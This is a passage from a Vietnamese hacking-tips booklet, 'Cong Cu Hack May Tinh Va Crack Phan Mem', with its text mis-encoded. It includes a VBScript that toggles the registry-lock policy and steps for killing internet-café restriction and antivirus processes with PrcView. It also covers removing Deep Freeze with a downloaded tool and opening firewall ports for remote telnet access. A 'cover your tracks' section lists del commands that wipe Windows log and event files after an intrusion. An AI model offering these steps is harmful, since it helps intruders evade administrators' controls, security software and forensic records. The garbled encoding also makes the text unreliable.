CreateObject("WScript. Shell")RegKey = "HKCU\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System\"ValueA = WSHShell.RegRead (regkey & "DisableRegistryTools")If ValueA = 0 Then ' Thay ñoåi giaù trò thaønh Enabled.Result = MsgBox("Welcome to Vu Dinh Cuong !" & _ vbNewLine & "Ban co muon khoa registry?", 36)If Result = 6 Then 'nuùt yes ñöôïc clickWSHShell.RegWrite regkey & "DisableRegistryTools", 1End IfElse 'thay ñoåi thaønh DisabledResult = MsgBox("Welcome to Vu Dinh Cuong !" & _ vbNewLine & "Ban co muon open registry?", 36)If Result = 6 Then 'yes ñöôïc clickWshShell.RegDelete "HKCU\SOFTWARE\Microsoft\Windows\Current-

Version\Policies\System\DisableRegistryTools"End IfEnd If

Khi chöông trình ñöôïc thöïc thi, coù daïng nhö sau (xemhình 2.2).Giaûi thích chi tieát:Trong phaàn Option Explicit:1. Khai baùo caùc bieán WSHShell, RegKey valueA,Result2. Ñeå taïo ra shell, duøng haøm CreateObject ("WScript.Shell").3. Gaùn cho bieán Regkey moät ñöôøng daãn: RegKey = "HKCU\SOFTWARE\ Microsoft\Windows\CurrentVersion\Policies\System\". 4. Sau ñoù ñöa vaøo registry nôi coù ñöôøng daãn laø Regkey moät leänh coù teân laøDisableRegistryTools.5. Kieåm tra xem bieán DisableRegistryTools coù baèng 0 chöa, neáu DisableRegistry- Tools =0 thì registry chöa ñöôïc khoùa vaø seõ hoûi baïn xem baïn coù muoán khoùa Registry khoâng? NeáuResult = 6, baïn nhaáp nuùt Yes, chöông trình seõ gaùn cho DisableRegistryTools = 1. Ngöôïclaïi, nhaáp vaøo nuùt Cancelthì khoâng laøm gì caû.6. Ngöôïc laïi chöông trình seõ kieåm tra taïi: "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", neáu DisableRegistryTools = 1 thì hoûilaïi baïn coù muoán môû registry khoâng.Taát caû scripts treân, baïn nhaäp thaønh moät file vaø löu noù döôùi daïng *.vbs. Vaäy laø baïn coù theå môû vaø khoùa registry moät caùch nhanh nhaát chæ vôùi moät thao taùc nhaápchuoät.

3. Loaïi boû caùc chöông trình haïn cheá ngöôøi duøng3.1 Giôùi thieäu

Hieän nay ôû moät soá tieäm Internet haïn cheá vieäc truy caäp caùc trang web nhaïy caûm cuõngnhö caám vaøo heä thoáng cuûa Windows nhö Registry. Caùc phaàn meàm coù theå laøm ñöôïc ñieàu

Hình 2.2: Chöông trình môû/khoùaRegistry



40 PC

Ñeål o a ï i

boû moät tieán trình naøo ñoù, baïn chæ caàn choïntieán trình töông öùng vôùi teân phaàn meàm caànloaïi boû sau ñoù nhaáp nuùt Killlaø xong.

Moät soá tieán trình (taäp tin thöïc thi) cuûachöông trình:

o Easy Cafe: client.o MF5: mf5.o Symantec: Vptray.o DWK: dwk.

3.3 Khoùa maùy tính baèng ñóa meàmThuû thuaät naøy chæ thöïc hieän ñöôïc khi

baïn ñaõ ñaêng nhaäp vaøo maùy. Caùc böôùc thöïchieän nhö sau:1 Ñöa ñóa meàm vaøo oå ñóa.2 Vaøo Start > Run…, goõ syskey, nhaápOK (xem hình 3.3).

3 Nhaáp Updatehoaëc nhaán Alt+ U, xuaáthieän hoäp thoaïi Startup Key (xem hình3.4).

naøy laø DWK, MF5 hay moät soá chöông trìnhchuyeân duïng khaùc nhö shadow user hayDeepfree, Easy cafe… Toâi seõ giôùi thieäu ñeáncaùc baïn moät giaûi phaùp thoâng duïng giuùploaïi boû caùc chöông trình naøy.3.2 Duøng PrcView V 3.7.3.1* Giôùi thieäu

Trong nhieàu tröôøng hôïp Task Managerhoaøn toaøn voâ hieäu vôùi ngöôøi duøng vì ngöôøiquaûn trò khoâng cho chuùng ta thao taùc treânchuùng. Luùc naøy, baïn khoâng theå laøm ngöngmoät soá tieán trình ñang chaïy. Vôùi PrcView,baïn hoaøn toaøn coù theå laøm ñöôïc ñieàu naøymaø khoâng caàn söï trôï giuùp cuûa Task man-ager.Ñòa chæ taûi phaàn meàm

http://www.freewebtown.com/vudinhcuong/PrcView.zip hoaëchttp://www.dvpub.com.vn

Giao dieän cuûa chöông trình nhö sau (xemhình 3.1).

* Caùch thöïc hieän:

Ñeå laøm ngöng moät tieán trình ñang chaïy,baïn chæ caàn thöïc thi chöông trình PrcView.Khi ñoù, chöông trình seõ töï ñoäng hieån thòcaùc tieán trình ñang chaïy treân Windows.Ví duï: Muoán loaïi boû chöông trình NortonSymantec, baïn thöïc hieän nhö sau:1 Khôûi chaïy chöông trình PrcView.2 Tìm taäp tin VpTray, sau ñoù vaøoProcess > Killhoaëc nhaáp Killtreânthanh Standard (xem hình 3.2).

Hình 3.2: Loaïi boû Norton Symantec

Hình 3.3: Giao dieän cuûa Syskey.exe

Hình 3.1: Giao dieän cuûa PrcView





PC 41

4 Nhaáp choïn System Generated Pass-word > Store Startup Key on FloppyDisk, nhaáp OK ñeå taïo Password treânñóa meàm.

Ñeán ñaây, baïn hoaøn toaøn yeân taâm maùy tínhñaõ ñöôïc baûo veä. Baïn chæ ñaêng nhaäp ñöôïcvaøo heä thoáng khi coù ñóa meàm maø thoâi.3.4 Loaïi boû Deep Free baèng Deep UnFree1.6

Deep Free laø moät chöông trình raát ñöôïccaùc nhaø quaûn lyù Internet quan taâm nhaèmgiôùi haïn truy caäp cuûa ngöôøi duøng ñeán caùctrang web nhaïy caûm nhöng ñoâi khi ñieàunaøy laïi gaây khoù khaên vôùi ngöôøi duøng. Vì lyùdo naøy, chuùng ta cuøng tìm hieåu moät coângcuï raát höõu ích ñeå loaïi boû Deep Free. Baïncoù theå download chöông trình naøy taïi:

http://www.freewebtown.com/vudinhcuong/deepunfree.rar hoaëc http://www.dvpub.com.vn

Neáu maùy coù caøi ñaët Deep Free thì khi ñöôïcmôû leân, Deep UnFree seõ thöïc hieän tìmkieám vaø xuaát hieän thoâng baùo Deep Freedetected!(xem hình 3.5).Ñeå loaïi boû Deep Free, thöïc hieän nhö sau:1 Nhaáp vaøo Boot Thawed, nhaáp nuùtSave Status.

2 Nhaáp vaøo Boot Thawed on next, sau

ñoù nhaäp thôøi gian ñeå cho maùy khôûiñoäng laïi maëc ñònh laø 1 phuùt (xem hình3.6).

3 Sau khi ñaõ khôûi ñoäng laïi, nhaáp LoadStatus. Baây giôø, baïn coù theå truy caäpvaøo baát cöù moät trang web naøo maø baïnthích.

3.5 Phöông phaùp môû coång ñôn giaûnPhaàn naøy toâi seõ giôùi thieäu vôùi baïn moät

phöông phaùp môû coång ñôn giaûn ñoù laø duøngtaäp tin Firewall.cpl ñeå coù theå truy caäp moätmaùy töø xa thoâng qua caùc coâng cuï keát noáinhö FPT, telnet. Ñeå tieán haønh môû coång, baïn thöïc hieän caùcböôùc sau:1 Vaøo Start > Run…, goõ firewall.cpl

(xem hình 3.7).2 Choïn theû Exceptions, nhaáp AddPort…

Trong muïc Add Portcoù hai giao thöùc TCPhay UDP, nhaáp choïn moät giao thöùc thíchhôïp, sau ñoù nhaäp teân Port trong muïc Name

Hình .3.6: Khôûi ñoäng laïi maùy tính sau moät phuùt

Hình 3.5: Giao dieän cuûa Deep Unfree

Hình 3.4: Khoùa maùy tính baèng ñóa meàm





42 PC

vaø soá Port trong muïc Port Number(xem hình 3.8).3 Baây giôø, baïn coù theå duøng coâng cuï nhö FTP hay telnet ñeå keát noái ñeán maùy naøy thoâng

qua ñòa chæ IP vaø coång vöøa môû.3.6 Xoùa daáu veát

Moät phöông phaùp giuùp baïn khoâng ñeå laïi daáu veát khi xaâm nhaäp vaøo maùy tính. VaøoStart > Run…, goõ cmd, nhaán Enterñeå vaøo giao dieän DOS.

Taïi daáu nhaéc leänh, thöïc hieän caùc böôùc sau:del C:\windows\system32\logfiles\*.* del C:\windows\ssytem32\config\*.evt del C:\windows\system32\dtclog\*.* del C:\windows\system32\*.log del C:\windows\system32\*.txt del C:\windows\*.txt del C:\windows\*.log

Hình 3.8: Môû coång 10000

0000000000

Hình 3.7: Giao dieän cuûa Windows Firewall



PC 43

Môøi caùc baïn tìm ñoïcCAÙC CHUYEÂN ÑEÀ ÑAÕ PHAÙT HAØNH

ª BAÛO VEÄ MAÙY TÍNH BAÈNG TÖÔØNG LÖÛA Nguyeãn Vaên Khoa 7,500ñª BIOS (Chæ caàn 7500ñ ñeå taêng toác heä thoáng) Ñinh Phan Chí Taâm 7,500ñª CAØI ÑAËT & SÖÛ DUÏNG CAÙC PHAÀN MEÀM

TIEÄN ÍCH Phan Chaâu Phuùc Sinh 7,500ñª CAØI ÑAËT MOÄT SOÁ PHAÀN MEÀM VAØ

PHAÀN CÖÙNG THOÂNG DUÏNG Huyønh Thanh Hieån 7,500ñª CHUYEÂÂN ÑEÀ THIEÁT KEÁ ÑOÀ HOÏA (TAÄP 1) B&W Group 7,500ñª COÂNG NGHEÄ ADSL VAØ NHÖÕNG ÖÙNG

DUÏNG TRONG MAÏNG LAN Ñoã Tuaán Phong 7,500ñª FIREFOX (Duyeät web hieäu quaû) Nguyeãn Thaønh Coâng 7,500ñª HIEÄU ÖÙNG PHOTOSHOP (TAÄP 7) Nguyeãn Kim Haûi 8,500ñª HÖÔÙNG DAÃN CAÙCH SÖÛ DUÏNG CAÙC

CHÖÔNG TRÌNH GÖÛI NHAÄN MAIL Ngoâ Vuõ Thaéng 9,000ñª HÖÔÙNG DAÃN PHUÏC HOÀI HEÄ THOÁNG Löông Baûo Khaùnh 7,500ñª INTERNET CHO MOÏI NGÖÔØI Phan Ñaêng Duy Thinh 9,000ñª KINH NGHIEÄM SÖÛ DUÏNG WINDOWS XP

VAØ MOÄT SOÁ PHAÀN MEÀM THOÂNG DUÏNG Nguyeãn Ñình Tuù 7,500ñª KYÕ THUAÄT BOOTROM Vöông Phuùc 7,500ñª LAØM CHUÛ MAÙY TÍNH CAÙ NHAÂN Nguyeãn Ngoïc Haûi 7,500ñª LAØM CHUÛ REGISTRY Nguyeãn Höõu Phöông Quang 7,500ñ ª CLICK- CHUYEÂN ÑEÀ THIEÁT KEÁ ÑOÀ HOÏA (T2) Döông Trung Hieáu 7,500ñª LAÄP TRÌNH ÖÙNG DUÏNG VÔÙI JAVASCRIPT (T2) Nguyeãn Vaên Khoa 12,000ñª HIEÄU ÖÙNG PHOTOSHOP (T9) Nguyeãn Kim Haûi 7,500ñª NEÙN TAÄP TIN-TÌM HIEÅU VAØ ÖÙNG DUÏNG Nguyeãn Coâng Minh 8,500ñª KHAÙM PHAÙ REGISTRY TRONG WINDOWS XP Huyønh Thanh Hieâån 8,500ñª QUAÛN TRÒ DÒCH VUÏ TRONG WINDOWS

SERVER 2003 Quaùch Löôïm 7,500ñª SÖÛ DUÏNG MICROSOFT OUTLOOK 20003 Phan Ñaêng Duy Thinh 7,500ñª THIEÁT KEÁ MAÃU VAÄT VÔÙI PHOTOSHOP Nguyeãn Kim Haûi 7,500ñ ª TOÅNG QUAN VEÀ 3D STUDIO MAX 7.0 Nguyeãn Traàn Huøng 7,500ñª XAÂY DÖÏNG FORUM VÔÙI WEBWIZFORUM Voõ Xuaân Vyõ 9,000ñª SÖÛ DUÏNG MAIL TRONG LOTUS NOTES Phaïm Thò Nguyeät 7,500ñª ÑIEÄN THOAÏI THOÂNG MINH Leâ Nguyeãn Thanh Bình 7,500ñª THIEÁT KEÁ LOGO & GIAO DIEÄN

VÔÙI PHOTOSHOP Nguyeãn Kim Haûi 7,500ñª THUÛ THUAÄT SÖÛ DUÏNG MAÙY TÍNH Nguyeãn Thaønh Coâng 7,500ñ



44 PC

ª PHOTOSHOP DAØNH CHO THÔÏ XÖÛ LYÙ AÛNH Nguyeãn Nhö Thi 7,500ñª HÖÔÙNG DAÃN CAØI ÑAËT VAØ QUAÛN LYÙ MAÏNG Phaïm Trung Kieân 12,000ñª CHÆNH SÖÛA AÛNH CHAÂN DUNG VÔÙI

PHOTOSHOP (T5) Traàn Nguyeân Nhaõ 8,500ñ ª CAÅM NANG SOAÏN THAÛO VAÊN BAÛN WORD Quaùch Löôïm 7,500ñª LAØM CHUÛ NERO EXPRESS 7 Voõ Xuaân Vyõ 7,500ñª BAÛO MAÄT WINDOWS Löông Baûo Khaùnh 8,500ñª HÖÔÙNG DAÃN SÖÛ DUÏNG NORTON GHOST Toâ Ngoïc Tuyeàn 8,500ñª XAÂY DÖÏNG FTP SERVER VÔÙI

GIAÛI PHAÙP DYNAMIC Vöông Phuùc 7,500ñª LAØM QUEN VÔÙI LINUX Phan Ñaêng Duy Thinh 7,500ñª SÖÛ DUÏNG COÂNG CUÏ TÌM KIEÁM TREÂN Buøi Thò Nhö Quyønh 11,000ñ

INTERNET Ñâoã Tuaán Phongª SÖÛ DUÏNG MEDIA CENTER TRONG

WINDOWS XP 2005 Nguyeãn Vaên Khoa 7,500ñª WORD 2003 - THAM KHAÛO NHANH Phan Thò Dieäu 7,500ñ ª WINDOWS - LINUX TAÁN COÂNG & PHOØNG THUÛ Quaùch Löôïm 7,500ñª THUÛ THUAÄT THIEÁT KEÁ WEB VÔÙI

PHOTOSHOP Nguyeãn Anh Tuù 12,000ñª XAÂY DÖÏNG MAÏNG VPN VÔÙI GIAO THÖÙC

PPTP Vöông Phuùc 8,500ñª XAÂY DÖÏNG WEBSITE VÔÙI DREAMWAVER 8 Höông Tinh Veä 9,500ñª AÙNH SAÙNG - MAØU SAÉC COÂNG CUÏ CHUYEÂN

DUØNG XÖÛ LYÙ AÛNH Nguyeãn Vaên Löông 8,500ñª PHÖÔNG PHAÙP TAÙCH HÌNH TRONG

PHOTOSHOP Vöông Thaønh Chung 7,500ñ ª BAÛO VEÄ AN TOAØN MAÙY TÍNH Nguyeãn Coâng Minh 9,500ñª TAÏO AÛNH NGHEÄ THUAÄT VÔÙI PHOTOSHOP (T1) Trâaàn Nguyeân Nhaõ 8,500ñª HÖÔÙNG DAÃN CAØI ÑAËT & SÖÛ DUÏNG DÒCH VUÏ

TRONG FEDORA CORE 5 Tröông Thanh Tuù 8,500ñª ISA SERVER 2004 - TÖÔØNG LÖÛA SIEÂU CAÁP Nguyeãn Taán Phaùt 13,000ñª CPAC IMAGING PRO - BÍ QUYEÁT DAØNH CHO

THÔÏ XÖÛ LYÙ AÛNH CHUYEÂN NGHIEÄP Traàn Nguyeân Nhaõ 15,500ñª HÖÔÙNG DAÃN SÖÛ DUÏNG PHAÀN MEÀM KEÁT

NOÁI ÑIEÄN THOAÏI DI ÑOÄNG VÔÙI MAÙY TÍNHõ Nguyeãn Vaên Khoa 11,000ñª DOWNLOAD - GIAÛI PHAÙP TAÊNG TOÁC Cao Traàn Nghóa 9,000ñª THUÛ THUAÄT WORD - EXCEL Traàn Ñaïi Minh Trí 12,000ñ ª TRA CÖÙU HAØM EXCEL Traàn Thò Kim Hoaøi 7,500ñ ª DÖÏNG PHIM VÔÙI WINDOWS MOVIE MAKER Phan Thò Dieäu 7,500ñ ª THIEÁT KEÁ MAÃU VÔÙI CORELDRAW Nguyeãn Vaên Löông 7,500ñª KYÕ THUAÄT GHEÙP HÌNH Nguyeãn Vaên Löông 9,500ñ



Cong Cu Hack May Tinh Va Crack Phan Mem(Vu Dinh Cuong)

Documents

Transcript of Cong Cu Hack May Tinh Va Crack Phan Mem(Vu Dinh Cuong)